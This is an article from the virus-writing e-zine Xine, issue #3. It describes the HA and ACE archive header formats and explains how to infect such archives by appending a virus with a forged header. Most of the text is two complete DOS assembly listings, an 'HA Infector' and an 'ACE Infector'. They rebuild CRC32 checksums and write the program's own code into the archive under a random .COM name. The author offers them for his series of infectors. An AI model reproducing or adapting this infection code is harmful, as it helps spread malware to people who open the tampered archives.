Copy Link
Add to Bookmark
Report
Xine - issue #3 - Phile 111
/-----------------------------\
| Xine - issue #3 - Phile 111 |
\-----------------------------/
Dropping over
Compression alternative format : HA & ACE
By UnknowN MnemomaniaK [iKx]
Introduction to HA
+------------------+
Ha is an a bit old compression format , it was thought to work with
compatibitility from linux to ibm dos , obviously it is not really used , I
have never seen any HA but the archive exists, so I decided to code it into
my infectors series in honor of the Zhengxi virus , then let's see how it
works.
HA Format
+---------+
The Ha structure is simple like rar structure but has a little difficulty,
Ha archive is fragmented in two zones
The little that has just : db 'HA' Ha mark
dw 0 number of archive
and following this part , there are a lot of archives that all must respect
this header
OFFSET LABEL TYPE VALUE DESCRIPTION
------ ----------- ---- ----------- ----------------------------------
00 VERCOMP DB 0 compression method & ver need
value: 0 = 'CPY' Stored 2 = 'HSC' compress using a [sic?]
1 = 'ASC' Default compress. 14 = 'DIR' Directory entry
15 = 'SPECIAL' Unknwon (ver 0.99B)
01 COMPRESS HEX 00000000 compressed size
05 ORIG HEX 00000000 original size
09 CRC32 HEX 00000000 Crc32
0D DATEHOUR HEX 00000000 File-time Unix Standard
?? PATHNAME DS ? Pathname
?? SEPARATOR DB 0FF Separator equal to 0FFh
?? FILENAME DS ? Filename
?? SPEC DB 1 Machine spec
Value: 0 = MS DOS
1 = Linux
?? INFO DW 2 Information - Usually File Attributes
Infection
+---------+
The HA file infection is quite simple , you have to verify that the first 2
bytes are equal to HA , increment the word at offset 02h in the file by 1,
read 0Dh bytes , go to the end write it , write No Pathname + Filename ,
write spec and close the file , damn , let's build an algorithm
1ø Read 4 bytes
2ø Verify the 2 first bytes , if <> HA then close file
3ø Inc the word at offset 02h
4ø Read 0Dh
5ø Rebuild the CRC32 & the name , (-> rebuild header)
6ø Go to the end
7ø Write the virus
8ø Close the file
The Asm file are under the ACE infection, if you need code , don't hesitate
Introduction to ACE
+-------------------+
ACE format is a quite new format that has basically the same structure than
RAR , ACE is a serious archive build by an independent , some razor warez
issue of razor are know under this file format . Ace compression/
decompression software is quite good looking and you have very soon the
impression that you have to do with professional material.
ACE Format
+----------+
I'll just detail the format of one header only becoz you just need to drop
it and drop the virus to infect an archive
OFFSET LABEL TYP VALUE DESCRIPTION
------ ----------- ---- ----------- ----------------------------------
00 HEADCRC DW 0000 CRC32x of the header(from 04 to 04+w,[02])
02 HEADSIZ DW 0000 Size of the header
04 HEADTYPE DB 0 Header type : 01 equal files
05 HEAD-FLAGS DW 0 Header : 8001h equal no problem flags :]
07 COMPRESS HEX 00000000 Compressed size
0B ORIG HEX 00000000 Original size
0F FILE TIME HEX 00000000 File time
13 FILE ATTRIB HEX 00000000 Considered as a DWORD,but a WORD is Used
17 CRC32x HEX 00000000 CRC32x of the file
18 INFOS HEX 00000000 Unknown ( Unused ? )
1B RESERVED DW 0000 Use a existing one
1F FILENAMESIZ DW 0000 Unknown ( Unused ? )
?? FILENAME DS NameFile
Ace structure is kinda secret because not too used and not reprogrammed by
a lot of people like rar arj or zip , but by one individual person only
What's the CRC32x ? then it's basically the CRC32 who are applying a second
not. It's because the programmer forgot to put that in his CRC routine
Infection
+---------+
So , I consider that the best solution with ace files is to drop one
header from an existing packet in the archive , then you go to the end,
you rebuild the header , you calculate Header CRC , you drop the header and
1ø Go to the end
2ø Rebuild the header
3ø Write the header
4ø Write the virus
5ø Close tha file
But in the example, I have analysed the complex ACE header structure to get
an existing one header as temporary , let's see how I did that if you are
interested with that
- - - HA Infector ( test it with the appropried name file ) - - - - - - - - -
.model tiny
.code
.286
org 100h
start:
mov ax,3d02h ; open HA file
mov dx,offset name1
int 21h
xchg ax,bx
mov ah,3fh ; read first 256 byte
mov cx,256
mov dx,offset temporary1
int 21h
cmp word ptr [temporary1],'AH' ; test if archive is
jne HA_invalid ; a real ha
inc word ptr [temporary1+2] ; increment
; number of archive
mov al,2
call go ; go to the end
call HA_build ; rebuild an HA header
mov ah,40h
mov dx,offset temporary1+4
int 21h ; write the new header
mov ah,40h
mov cx,fin-start
mov dx,offset start
int 21h ; write the virus
xor ax,ax
call go
mov ah,40h
mov cx,4
mov dx,offset temporary1
int 21h ; write the new 1st
; packet
HA_invalid:
mov ah,3Eh
int 21h ; close the file
ret
HA_build:
mov bp,offset temporary1+4
mov byte ptr [bp],20h ; set to no compression & version
inc bp
mov word ptr [bp],fin-start ; set 01h = file size
mov word ptr [bp+2],0
add bp,4
mov cx,fin-start
mov word ptr [bp],cx ; set 05h = file size too
mov word ptr [bp+2],0
add bp,4
mov si,offset start
push bp
call crc_calc
pop bp
mov word ptr [bp],cx ; set 09h as CRC32 of the file
mov word ptr [bp+2],dx
add bp,8
mov byte ptr [bp],0 ; set no path name
inc bp
call set_a_name ; set a new name
mov di,bp
add bp,cx
mov si,offset betaname
repz movsb ; copy it
mov cx,bp
sub cx,offset temporary1+1
mov word ptr [bp],0102h ; write machine infos ...
mov byte ptr [bp+2],20h
ret ; return with header size in cx
set_a_name:
mov ah,2Ch ; make aleatory a new name
int 21h
and cx,0000111100001111b
and dx,0000111100001111b
add cx,4141h
add dx,4141h
mov word ptr [betaname],cx
mov word ptr [betaname+2],dx
mov word ptr [betaname+4],'C.'
mov word ptr [betaname+6],'MO'
mov word ptr [betaname+8],0
mov cx,9
ret
go: ; File seek
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
ret
crc_calc:
push bx
push si cx
call crc_table ; calculate crc table
pop cx si
mov bp,cx
mov cx,0ffffh
mov dx,0ffffh
xor ax,ax
Crc_loop:
lodsb
mov bx,ax
xor bl,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,bh
shl bx,1
shl bx,1
xor cx,word ptr [bx+di]
xor dx,word ptr [bx+di+02]
dec bp
jnz Crc_loop
not dx
not cx
pop bx
ret
crc_table:
mov di,offset starttable+1024 ; the buffer table
; remember : It begin by the end
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On
TableHighloop: ; the major loop in the Crc table Calc
mov cx,8 ; set the minus loop to 8
mov dx,bp ; dx = bp , major counter loop
xor ax,ax ; ax = zero
TableLowLoop:
shr ax,1 ; mov one byte of ax at right in bin
rcr dx,1 ; if anything lost , put it on dx
jae anomality ; if above or equal skip encrypt.
xor dx,08320h ; encrypt value by a signature
xor ax,0EDB8h ;
anomality:
loop TableLowLoop ; make it 8 times
stosw ; write ax
xchg dx,ax
stosw ; not write dx
dec bp ; decrement the counter
jnz TableHighLoop ; repeat it until bp = 0
mov word ptr [di],0 ; last value equal 0
sub di,2
mov word ptr [di],0
cld ; clear direction flag
ret
name1: db 'yeye.ha',0
fin:
betaname: db 13 dup (?)
starttable: db 1024 dup (?)
db 2 dup (?)
temporary1: db 256 dup (?)
end start
- - - HA Infector - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - ACE Infector ( test it with the appropried name file )- - - - - - - - -
.model tiny
.code
.286
org 100h
start:
mov ax,3d02h
mov dx,offset name1
int 21h ; open filename
xchg ax,bx
mov ah,3fh
mov cx,4
mov dx,offset temporary1 ; read 4 first bye put it into
int 21h ; temporary
xor cx,cx
mov dx,word ptr [temporary1+2] ; go to offset w,[02h]
add dx,4
xor ax,ax
call gozero
mov ah,3fh
mov cx,256
mov dx,offset temporary1
int 21h ; read 256 bytes
call ace_header ; build a new ace_header
mov al,2
call go
mov ah,40h
mov cx,word ptr [bp+2]
add cx,4
mov dx,offset temporary1
int 21h ; write the header
mov ah,40h
mov cx,fin-start
mov dx,offset start
int 21h ; write the virus
ACE_invalid:
mov ah,3Eh
int 21h ; close the file
ret
ACE_header:
mov bp,offset temporary1
mov byte ptr [bp+4],01 ; set no compression
mov word ptr [bp+5],8001h ; no flags
mov word ptr [bp+7],fin-start ; virus as compress & uncpss
mov word ptr [bp+7+2],0 ; size
mov word ptr [bp+0Bh],fin-start
mov word ptr [bp+0Bh+2],0
push bp
mov si,100h
mov cx,fin-start
call crc_calc
pop bp ; calc crc of the virus
not dx ; not ( not (ax)) = ax
not cx
mov word ptr [bp+17h],cx
mov word ptr [bp+17h+2],dx ; save it here
call set_a_name ; create new name without
dec cx ; Zero End
mov word ptr [bp+1Dh+4],cx ; copy file size
mov word ptr [bp+02],cx
add word ptr [bp+02],1Fh ; copy header size (1Fh+cx)
lea di,[bp+1Fh+4]
mov si,offset betaname ;
repz movsb ; copy name
push bp
lea si,[bp+4]
mov cx,word ptr [bp+2]
call crc_calc ; render header CRC
pop bp
not cx
mov word ptr [bp],cx
ret
set_a_name: ; set a new name
mov ah,2Ch
int 21h
and cx,0000111100001111b
and dx,0000111100001111b
add cx,4141h
add dx,4141h
mov word ptr [betaname],cx
mov word ptr [betaname+2],dx
mov word ptr [betaname+4],'C.'
mov word ptr [betaname+6],'MO'
mov word ptr [betaname+8],0
mov cx,9
ret
go:
xor cx,cx
xor dx,dx
gozero:
mov ah,42h
int 21h
ret
crc_calc:
push bx
push si cx
call crc_table ; calculate crc table
pop cx si
mov bp,cx
mov cx,0ffffh
mov dx,0ffffh
xor ax,ax
Crc_loop:
lodsb
mov bx,ax
xor bl,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,bh
shl bx,1
shl bx,1
xor cx,word ptr [bx+di]
xor dx,word ptr [bx+di+02]
dec bp
jnz Crc_loop
not dx
not cx
pop bx
ret
crc_table:
mov di,offset starttable+1024-2 ; the buffer table
; remember : It begin by the end
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On
TableHighloop: ; the major loop in the Crc table Calc
mov cx,8 ; set the minus loop to 8
mov dx,bp ; dx = bp , major counter loop
xor ax,ax ; ax = zero
TableLowLoop:
shr ax,1 ; mov one byte of ax at right in bin
rcr dx,1 ; if anything losted , put it on dx
jae anomality ; if above or equal skip encrypt.
xor dx,08320h ; encrypt value by a signature
xor ax,0EDB8h ;
anomality:
loop TableLowLoop ; make it 8 times
stosw ; write ax
xchg dx,ax
stosw ; not write dx
dec bp ; decrement the counter
jnz TableHighLoop ; repeat it until bp = 0
mov word ptr [di],0 ; last value equal 0
sub di,2
mov word ptr [di],0
cld ; clear direction flag
ret
name1: db 'yeye.ace',0
fin:
betaname: db 13 dup (?)
starttable: db 1024 dup (?)
db 2 dup (?)
temporary1: db 256 dup (?)
end start
- - - ACE Infector - - - - - - - - - - - - - - - - - - - - - - - - - - - - -